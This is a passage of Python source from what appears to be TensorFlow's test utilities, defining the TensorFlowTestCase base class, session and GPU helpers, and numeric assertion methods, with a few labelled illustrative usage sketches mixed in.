the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_test_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all([x in str(e) for x in ["CUDA", "not find"]]):
raise e
else:
logging.error(str(e))
return False
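# Illustrative usage sketch (not part of the original TensorFlow source): how a
# test might gate GPU-specific work on availability and a minimum compute
# capability. The (3, 5) threshold is an arbitrary assumption.
def _example_gpu_gate():
  if is_gpu_available(cuda_only=True, min_cuda_compute_capability=(3, 5)):
    return gpu_device_name()
  return "/device:CPU:0"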
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run().
"""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable logging for OutOfRangeError, which would otherwise make the
# output of tf.data tests hard to read, because OutOfRangeError is used to
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This ensures that tests from different runs will not be able to
pollute each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This
stream must have a file descriptor, support writing via using that
file descriptor, and must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
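  # Illustrative usage sketch (not part of the original TensorFlow source): the
  # expected message may be given in text (ASCII proto) form. ConfigProto and
  # the field value are arbitrary assumptions for demonstration.
  def _example_assert_proto_equals_usage(self):
    cfg = config_pb2.ConfigProto(intra_op_parallelism_threads=4)
    self.assertProtoEquals("intra_op_parallelism_threads: 4", cfg)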
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices, tensor.values,
tensor.dense_shape)
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
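  # Illustrative sketch (not part of the original TensorFlow source): shows how
  # `evaluate` lets the same assertion run under both graph and eager execution.
  # The helper name and the ones() tensor are arbitrary assumptions.
  def _example_evaluate_usage(self):
    value = self.evaluate(array_ops.ones([2, 3]))
    # In eager mode `evaluate` calls .numpy(); in graph mode it runs the tensor
    # in a session. Either way a numpy array comes back.
    self.assertAllEqual(value, np.ones([2, 3]))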
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield None
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield None
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
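  # Illustrative usage sketch (not part of the original TensorFlow source):
  # exceptions raised inside the target are re-raised as a test failure when
  # join() is called, instead of being silently swallowed as they would be with
  # a bare threading.Thread. The helper name and target are arbitrary.
  def _example_checked_thread_usage(self):
    results = []
    t = self.checkedThread(target=results.append, args=(42,))
    t.start()
    t.join()  # Fails the test if the target raised.
    self.assertEqual(results, [42])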
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| <= err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
return a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if that does not work, then
# traverse through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray, or anything that can be converted to one.
b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
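  # Illustrative sketch (not part of the original TensorFlow source): with
  # float16 inputs the effective tolerances are widened to half_rtol/half_atol
  # (1e-3), so a difference of about one float16 ulp near 1.0 still passes even
  # though the default 1e-6 tolerances would reject it. The values below are
  # arbitrary assumptions.
  def _example_close_according_to_type(self):
    a = np.array([1.0, 2.0], dtype=np.float16)
    b = np.array([1.001, 2.0], dtype=np.float16)
    self.assertAllCloseAccordingToType(a, b)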
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
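  # Illustrative sketch (assumption): thanks to the NaN handling above, NaNs in
  # matching positions compare as equal for float dtypes:
  #
  #   self.assertAllEqual(np.array([1.0, np.nan]), np.array([1.0, np.nan]))  # passes
  #   self.assertAllEqual(np.array([1.0, np.nan]), np.array([np.nan, 1.0]))  # fails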
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
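  # Illustrative sketch (assumption): the four bound assertions above reduce the
  # input with np.min/np.max and delegate to the unittest comparison methods:
  #
  #   x = np.array([[1.0, 2.0], [3.0, 4.0]])
  #   self.assertAllGreater(x, 0.5)      # min(x) > 0.5
  #   self.assertAllLessEqual(x, 4.0)    # max(x) <= 4.0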
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
    If limit == N, this method will print up to the first N subscripts on
    separate lines. A line of ellipses (...) is appended at the end if the
    number of subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
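  # Illustrative sketch (assumption) of the summary produced for
  #   value = np.array([[5, 6], [7, 8]]) and subscripts = np.where(value > 5):
  #
  #   ["  [0 1] : 6", "  [1 0] : 7", "  [1 1] : 8"]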
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound)
if open_lower_bound else np.less(target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
